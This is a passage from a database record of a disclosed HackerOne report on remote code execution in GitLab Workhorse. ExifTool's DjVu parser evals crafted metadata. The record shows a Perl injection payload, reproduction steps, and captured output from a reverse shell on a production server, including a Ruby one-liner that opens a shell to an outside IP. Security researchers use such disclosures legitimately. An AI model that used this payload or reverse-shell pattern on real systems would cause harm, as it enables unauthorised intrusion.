--collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T06:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T05:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T05:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQX2ME2U7S%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T062945Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHUaCXVzLXdlc3QtMiJIMEYCIQCj7Q88Q2ZnYwhGfEvf6BY40vBEfR60E8WUdxTlD6tw5gIhAOmxWTE%2Ff5UUl2l7eWzlK7wPCviGyL5g55Z3QyzgAxDKKoMECP7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQAhoMMDEzNjE5Mjc0ODQ5IgxiBg8R2ftRUopbBbsq1wOBTWLV%2FcuPHgxJbEZISm5SysSgncHSCDjkTi6lgla01G9htv2CsFJ24Ppt7txedGcygci1Tkj0hxDFpfwBgZu8%2FmzIw73ueFp4g61vm11Y2WdInnXMevfbv82x%2BDt9QmW7i4lnV%2BKWg1JkYi0ddQ%2FxycWe5Hv1THOQlRFmTCGJkpXPBfrXKi61xsM0OXUuMcjUqP4lJPtTfdcDCaPnTGj50ETh5GXZG7N7PJzWdmqw0aqEn8lam4IC4ivOw3onF%2Bh3ZRnFChvl8aTbqq0yyRNlk%2Br0Z3WjirQ8kypEjUqJufjPMCTNXEoWnTl3VC93GlBRikKE2PrikBDN3RUidRYG6O%2ByMAL00u4uNMmTZeVROlBahg4IbDUX2gGVTEzRLwkwIiVb0p%2FpG9w8uegg3tFDsiEVoX41X1qPptsG8wrbWvLxY9LuRHqPbSsOOryI51V0OQs%2BwbTXAhJs7OJ%2Fvm2Ehl%2BuiIcixQWEZ%2BRlpgP7cOQIsXvCa4%2BhPMacORPe15VsQQ64lppYchhwtVb3cCJYx4Gy%2B7AhcGd%2B2LKc4xhe0BFgehUGLzVYatzHzA8RY7D9gyH0UDoMBIP3SIunQM6jS8QHLHJvUE9bofOOYfchAgaZMp7J%2FQ0w%2FZj9hAY6pAEPBfij%2FAiID1guNNUfONh8qE7lv0A3C%2Fffw%2FoJsD5RDJn9t%2FDXnQ7wu%2Bzlu3Dy4dei8Co%2FY4s2HM1Z2Q%2FpizF%2BsrirJ2DePxM9wT%2BFblA1P08IL6qBMiAPRNcZutJZsL%2BSP1x8E8amXKdT6o78ol4emMt94DpXUiETCUxZNU%2FmuDoi9yNv3vvCc5R4HZhNrONrNY4aMJc5CS9YufUwGR8YKzj4oA%3D%3D&X-Amz-Signature=1479b3a01eaa23ba02810aea2ed3d234ba9a16c8263badd047b3c382cdfe81d1"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T06:29:46", "differentElements": ["h1reporter"], "edition": 11}, {"bulletin": {"id": "H1:1154542", "hash": "dfbf24b5453c7e468b1cf8022c33a381", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 